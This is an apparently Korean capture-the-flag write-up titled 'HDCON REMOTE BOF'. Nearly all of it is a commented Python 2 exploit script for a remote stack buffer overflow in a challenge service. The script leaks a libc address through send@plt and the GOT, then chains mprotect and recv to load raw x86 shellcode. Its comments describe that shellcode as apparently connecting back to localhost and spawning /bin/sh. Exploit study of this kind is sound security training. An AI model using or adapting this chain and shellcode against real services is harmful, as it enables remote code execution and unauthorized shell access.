HDCON REMOTE BOF
Hacked by singi, exploiting & report by 광운
공격 페이로드는 아래와 같다.
STAGE1 = SEND + PPPR + SOCKFD + GOT_TIME + VALUE_0x4 + NULL + \
FUNC + AAAA + SOCKFD
STAGE2 = MPROTECT + PPPR + CUSTOM_STACK + SIZEOF_CUSTOM + MODE_EXEC +\
RECV + RETURN_CUSTOM + SOCKFD + CUSTOM_STACK + SHELLCODELEN + NULL
STAGE3 = SHELLCODE
from socket import *
import sys
import struct
# Python 2 script: every payload below is a `str` of raw bytes and is passed
# straight to socket.send(); under Python 3 these would have to be `bytes`.

# Stage-3 payload. The literal contains the bytes 7f 00 00 01 (127.0.0.1) and
# the strings "/bin" and "//sh", so it is presumably a connect-back shell to
# localhost — not verified here by disassembly.
SHELLCODE ="\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x66\x68\x22\xb8\x66\xb9\x02\x00\x66\x51\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\x31\xdb\x43\x43\x43\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"
# Length of the shellcode as a little-endian 32-bit value; used as the `len`
# argument of the recv() call in stage 2.
SHELLCODELEN = struct.pack('<L', len(SHELLCODE))
# Fixed addresses inside the challenge binary. They are hard-coded, so the
# chain only works against a non-PIE build at exactly these addresses; PIE
# (ASLR on the executable image) would break every constant in this file.
PLT_SEND = 0x08048610    # send@plt — called to leak a GOT entry back over the socket
GOT_TIME = 0x804a004     # GOT slot of time(); its resolved value is the libc leak
ADDR_FUNC = 0x080486d4   # function to return into after the leak (presumably re-enters the vulnerable read)
# ROP gadgets; by name these are pop;pop;pop;ret and pop;pop;pop;pop;ret,
# used to discard a callee's arguments before continuing the chain.
PPPR = struct.pack('<L', 0x804878d)
PPPPR = struct.pack('<L', 0x80489cc)
# Stage 1: 1036 filler bytes reach the saved return address (presumably
# buffer + saved frame pointer — TODO confirm), then a fake frame for
# send(sockfd=4, buf=GOT_TIME, len=4, flags=0). send() takes four
# arguments, so the four-pop gadget is used here even though the summary
# at the top of the page writes PPPR. The socket descriptor is assumed to
# be 4 in the target process.
STAGE1 = '\x41' * 1036 + struct.pack('<L', PLT_SEND) + PPPPR + '\x04\x00\x00\x00' + struct.pack('<L', GOT_TIME)
# ... then return into ADDR_FUNC with a dummy return address ('AAAA') and
# the socket descriptor as its single argument.
STAGE1 += '\x04\x00\x00\x00' + '\x00\x00\x00\x00' +struct.pack('<L', ADDR_FUNC) + '\x41\x41\x41\x41' + '\x04\x00\x00\x00'
if __name__ == '__main__':
    # Target is the local challenge service on port 7777.
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(('127.0.0.1', 7777))
    s.recv(1024)                 # consume the service banner/prompt
    s.send(STAGE1)
    # Stage 1's send() writes the 4-byte GOT entry of time() back to us.
    ADDR_TIME = struct.unpack('<L', s.recv(4))[0]
    # Derive other libc symbols by adding fixed offsets to the leak. These
    # offsets are specific to one libc build; any other libc version or
    # distribution build places them elsewhere and the chain fails.
    ADDR_MPROTECT = ADDR_TIME + 0x41B70
    ADDR_RECV = ADDR_TIME + 0x48080
    # Stage 2: mprotect(0x08048000, 0x1000, 7) — 7 is PROT_READ|PROT_WRITE|
    # PROT_EXEC — makes the first page of the binary's image writable and
    # executable. The three-pop gadget discards the three arguments.
    STAGE2 = '\x41' * 1036 + struct.pack('<L',ADDR_MPROTECT ) + PPPR + '\x00\x80\x04\x08' + '\x00\x10\x00\x00'
    # ... then recv(sockfd=4, buf=0x08048791, len=SHELLCODELEN, flags=0).
    # recv()'s return address is set to the same 0x08048791 it writes into,
    # so execution continues into whatever stage 3 delivers there.
    STAGE2 += '\x07\x00\x00\x00' + struct.pack('<L', ADDR_RECV) + '\x91\x87\x04\x08' + '\x04\x00\x00\x00'
    STAGE2 += '\x91\x87\x04\x08' + SHELLCODELEN + '\x00\x00\x00\x00'
    s.recv(1024)                 # consume the prompt printed by the re-entered function
    s.send(STAGE2)
    # Stage 3: the bytes that the recv() in stage 2 reads. Nothing here
    # waits for or checks a response; the script simply closes the socket.
    s.send(SHELLCODE)
    s.close()